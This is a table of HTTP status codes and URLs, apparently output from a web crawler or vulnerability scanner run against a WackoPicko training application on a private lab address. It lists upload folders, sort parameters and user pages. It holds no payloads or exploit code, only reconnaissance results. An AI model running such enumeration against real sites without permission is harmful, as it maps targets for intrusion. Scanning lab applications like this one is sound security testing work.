| 200 | http://192.168.0.26/WackoPicko/upload/testing/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/testing/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/testing/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/testing/again |
| 200 | http://192.168.0.26/WackoPicko/upload/testing/gfhhg |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/ |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togas |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togas.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togas.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togas.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togasfs |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togasfs.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togasfs.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/toga/togasfs.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/ |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/twist |
| 200 | http://192.168.0.26/WackoPicko/upload/twister/twister_fun |
| 200 | http://192.168.0.26/WackoPicko/upload/twister_funeXz3uM |
| 200 | http://192.168.0.26/WackoPicko/upload/twister_funxJObBz |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/ |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/?C=S;O=A |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/Waterfall |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/Waterfall.128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/Waterfall.128_128.jpg |
| 200 | http://192.168.0.26/WackoPicko/upload/waterfall/Waterfall.550.jpg |
| 200 | http://192.168.0.26/WackoPicko/users/ |
| 200 | http://192.168.0.26/WackoPicko/users/?C=D;O=A |
| 200 | http://192.168.0.26/WackoPicko/users/?C=M;O=A |
| 200 | http://192.168.0.26/WackoPicko/users/?C=N;O=D |
| 200 | http://192.168.0.26/WackoPicko/users/?C=S;O=A |
| 404 | http://192.168.0.26/WackoPicko/users/check_pass.php |
| 200 | http://192.168.0.26/WackoPicko/users/home.php |
| 200 | http://192.168.0.26/WackoPicko/users/login.php |
| 200 | http://192.168.0.26/WackoPicko/users/register.php |
| 404 | http://192.168.0.26/WackoPicko/users/sample.php |
| 200 | http://192.168.0.26/WackoPicko/users/sample.php?userid=1 |
| 303 | http://192.168.0.26/WackoPicko/users/similar.php |
| 303 | http://192.168.0.26/WackoPicko/users/view.php |
| 303 | http://192.168.0.26/WackoPicko/users/view.php?userid=16 |
| 303 | http://192.168.0.26/WackoPicko/users/view.php?userid=17 |